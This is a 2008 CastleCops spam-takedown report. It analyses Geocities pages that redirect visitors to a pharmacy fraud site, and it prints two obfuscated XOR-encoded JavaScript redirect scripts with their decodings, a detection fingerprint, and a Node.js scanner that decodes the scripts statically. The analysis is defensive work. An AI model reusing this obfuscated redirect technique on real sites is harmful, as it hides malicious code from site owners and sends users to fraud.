CastleCops, Internet Crime Fighters
SIRT(TM)

Spam Incident Reporting and Termination(TM) Squad

A global spam termination operation launched by CastleCops, the volunteer SIRT Squad is comprised of folks who report spam, investigate spam, and actively work on spam takedown and termination. SIRT is funded by CastleCops. Become a SIRT Squad terminator by reporting spam today!

Evidence status: confirmed spam

HTTP Response (06 Jul, 2008 10:22:16): HTTP/1.1 403 Forbidden
ID: 174335 (termination link)
Title: Geocities redirect
Entry: SIRT Squad
Reporter: tembow
Timestamp: 16 May, 2008 @ 01:08:29
Topic ID: 221815 - Read/respond to SIRT commentary.
Handler Note: 16 May, 2008 01:26:40
tembow: Consumed the following related reports:

[174336] http://geocities.com/dirkgill96/
Handler Note: 16 May, 2008 01:38:06
tembow: Two examples of Yahoo Geocities redirections to a Canadian Pharmacy fraud site. This report contains
(1) and (2) the sample redirection scripts from the sites & the decoding of those scripts,
(3) the generic fingerprint that identifies these malicious redirections,
(4) the method to rid Geocities of this huge infection, which is occurring at an abuse rate of 800 per day, as seen at http://rss.uribl.com/hosters/geocities_com.html.

(1) Sample redirection script for "dirkgill96"

// Rolling XOR key (23 characters) and the running index into it
var epoa='cqcxsnkyjlbtyfinwycuvgl';
var zxry=0;
// fiaknnc holds the encoded payload as hex byte pairs; rknmly collects the decoded text
var gzqsflk, rknmly, fiaknnc='5F02000A1A1E1F59060D0C130C070E0B4A5B291400063F00030A08074C550E0302061B0E481D0107570F1A1506180A1E0D561B1C0E1F4A51425311121D1E4D564C101715180B141B19101A451A0501454F45491A0D0510130148';
rknmly='';
var gzyw;
// Each hex pair becomes one byte, XORed with the next key character; the key index wraps at its length
for( gzqsflk=0; gzqsflk < fiaknnc.length; gzqsflk+=2){
  gzyw = unescape( '%' + fiaknnc.substr( gzqsflk,2));
  rknmly += String.fromCharCode( gzyw.charCodeAt(0) ^ epoa.charCodeAt(zxry++) );
  if ( zxry >= epoa.length ) zxry = 0;
}
// The decoded markup is written into the page, where the browser executes it
document.write(rknmly);

Decodes to

<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>



(2) Sample redirection script for "franciscopark37"

// Rolling XOR key (11 characters) and the running index into it
var punwiu='cqapugtvldb';
var zozdjs=0;
// lybn holds the encoded payload as hex byte pairs; yhwxje collects the decoded text
var tfbkr, yhwxje, lybn='5F0202021C17005600050C04040017105A563C0D120330121319051356481B0D0C071E165E01080458000B010205081F1B491C040902425E5146180113044C434B0702031518101F1515184A010C1C464B494807151E0D12174F';
yhwxje='';
var dtem;
// Same decode loop as the first sample, with a different key and payload
for( tfbkr=0; tfbkr < lybn.length; tfbkr+=2){
  dtem = unescape( '%' + lybn.substr( tfbkr,2));
  yhwxje += String.fromCharCode( dtem.charCodeAt(0) ^ punwiu.charCodeAt(zozdjs++) );
  if ( zozdjs >= punwiu.length ) zozdjs = 0;
}
// The decoded markup is written into the page, where the browser executes it
document.write(yhwxje);

Decodes to

<script language="JavaScript">window.top.location.href = 'http://earthexact.com';</script>


(3) Generic fingerprint for redirection scripts starts with
var {TS}='{TSLONG}';var {TS}=0;var{TS}, {TS}, {TS}='{HEX}';{TS}='';var {TS};for( {TS}=0;{TS} < {TS}.length;{TS}+=2){{TS} = unescape( '%' + {TS}.substr( {TS},2));

where {TS} is a variable lower-case text string of 3 - 9 characters,
{TSLONG} is a longer lower-case text string of 5 - 40 characters,
and {HEX} is a long hexadecimal character string comprising the set 0-9, A-F.

(4) Using this generic fingerprint, scan every Geocities page, and remove every page that matches. Keep running the scan and removal until the abuse ceases. Monitor for changes in the fingerprint and adjust accordingly.
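
The decoder and fingerprint scan that notes (1) through (4) describe, written out as an added example; this is not code from the report and not CastleCops or SIRT tooling. It assumes Node.js. The regular expression is a transcription of the generic fingerprint in (3) with whitespace tolerance where the samples wrap lines, the sample inputs are the two stubs quoted above with the line-wrap space removed from each hex string, and the function names are chosen here. The payload is decoded arithmetically, so the attacker's script is never executed.

```javascript
'use strict';

// Static analyser for the Geocities redirect stub (added example, not report code).
// The stub's decode loop is: byte i of the hex payload XOR key[i mod key.length].

const TS = String.raw`[a-z]{3,9}`;       // {TS}: short lower-case identifier
const TSLONG = String.raw`[a-z]{5,40}`;  // {TSLONG}: the XOR key
const HEX = String.raw`[0-9A-F]+`;       // {HEX}: the encoded payload

// Generic fingerprint from note (3). \s* sits between tokens because the
// samples break lines at different points. Groups: 1 = key, 2 = hex payload.
const FINGERPRINT = new RegExp(
  String.raw`var\s+${TS}\s*=\s*'(${TSLONG})'\s*;` +                        // var {TS}='{TSLONG}';
  String.raw`\s*var\s+${TS}\s*=\s*0\s*;` +                                  // var {TS}=0;
  String.raw`\s*var\s*${TS}\s*,\s*${TS}\s*,\s*${TS}\s*=\s*'(${HEX})'\s*;` + // var{TS}, {TS}, {TS}='{HEX}';
  String.raw`\s*${TS}\s*=\s*''\s*;` +                                       // {TS}='';
  String.raw`\s*var\s+${TS}\s*;` +                                          // var {TS};
  String.raw`\s*for\s*\(\s*${TS}\s*=\s*0\s*;\s*${TS}\s*<\s*${TS}\.length\s*;\s*${TS}\s*\+=\s*2\s*\)` +
  String.raw`\s*\{\s*${TS}\s*=\s*unescape\s*\(\s*'%'\s*\+`,                 // {TS} = unescape( '%' +
  'g'
);

// Reproduces the stub's loop without eval: each hex pair is one byte, XORed
// with the key character at the same position modulo the key length.
function xorDecode(hex, key) {
  if (hex.length % 2 !== 0 || !/^[0-9A-Fa-f]*$/.test(hex)) {
    throw new Error('payload is not an even-length hex string');
  }
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    const byte = parseInt(hex.slice(i, i + 2), 16);
    out += String.fromCharCode(byte ^ key.charCodeAt((i / 2) % key.length));
  }
  return out;
}

// Pulls the redirect destination out of the decoded payload, if there is one.
function redirectTarget(decoded) {
  const m = /location\.href\s*=\s*['"]([^'"]+)['"]/.exec(decoded);
  return m ? m[1] : null;
}

// Scans one page body and returns one finding per matching stub.
function scanPage(pageText) {
  const findings = [];
  FINGERPRINT.lastIndex = 0;
  let m;
  while ((m = FINGERPRINT.exec(pageText)) !== null) {
    const decoded = xorDecode(m[2], m[1]);
    findings.push({ key: m[1], decoded, target: redirectTarget(decoded) });
  }
  return findings;
}

// Constructed inputs: the two stubs quoted in the report, hex wrap-space removed.
const SAMPLE_DIRKGILL96 = `var epoa='cqcxsnkyjlbtyfinwycuvgl';
var zxry=0;
var gzqsflk, rknmly, fiaknnc='5F02000A1A1E1F59060D0C130C070E0B4A5B291400063F00030A08074C550E0302061B0E481D0107570F1A1506180A1E0D561B1C0E1F4A51425311121D1E4D564C101715180B141B19101A451A0501454F45491A0D0510130148';
rknmly='';
var gzyw;
for( gzqsflk=0;
gzqsflk < fiaknnc.length;
gzqsflk+=2){gzyw = unescape( '%' + fiaknnc.substr( gzqsflk,2));
rknmly += String.fromCharCode( gzyw.charCodeAt(0) ^ epoa.charCodeAt(zxry++) );
if ( zxry >= epoa.length ) zxry = 0;
}document.write(rknmly);`;

const SAMPLE_FRANCISCOPARK37 = `var punwiu='cqapugtvldb';
var zozdjs=0;
var tfbkr, yhwxje, lybn='5F0202021C17005600050C04040017105A563C0D120330121319051356481B0D0C071E165E01080458000B010205081F1B491C040902425E5146180113044C434B0702031518101F1515184A010C1C464B494807151E0D12174F';
yhwxje='';
var dtem;
for( tfbkr=0;
tfbkr < lybn.length;
tfbkr+=2){dtem = unescape( '%' + lybn.substr( tfbkr,2));
yhwxje += String.fromCharCode( dtem.charCodeAt(0) ^ punwiu.charCodeAt(zozdjs++) );
if ( zozdjs >= punwiu.length ) zozdjs = 0;
}document.write(yhwxje);`;

// Stand-alone run: report the key and redirect target found in each sample.
for (const f of [SAMPLE_DIRKGILL96, SAMPLE_FRANCISCOPARK37].flatMap(scanPage)) {
  console.log(`key=${f.key} target=${f.target}`);
}
```

Both samples decode to the same redirect to earthexact.com, which is what makes the destination, rather than the per-page key and payload, the stable indicator to block and takedown on; the fingerprint regex is what a page-wide scan under note (4) would run, and a change in the stub's shape shows up as pages that no longer match.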


Handler Note: 16 May, 2008 01:40:54
tembow: NOTE: This is a pervasive problem with serious consequences for Yahoo's reputation and integrity.
Escalate this issue immediately to the Corporate Security level for implementation.
Handler Note: 16 May, 2008 01:42:40
tembow: Generated and sent email spam alert to respective parties.

Fetched URLs
Slaves: 174336

Report for at 16 May, 2008 @ 00:51:38


Fetched page at 16 May, 2008 @ 00:51:51
MD5 Fingerprint: 08266afaf17e305a81e52d00c3c04b93
SHA1 Fingerprint: 968fbf60f12a77f3c228bfabf2cc258def25bcd1

Fetched page at 16 May, 2008 @ 01:27:17
MD5 Fingerprint: 0aa0f75ec944007ddf801b5375edf423
SHA1 Fingerprint: 1953bf695e4127d50f2753cf1b92da9724c700fc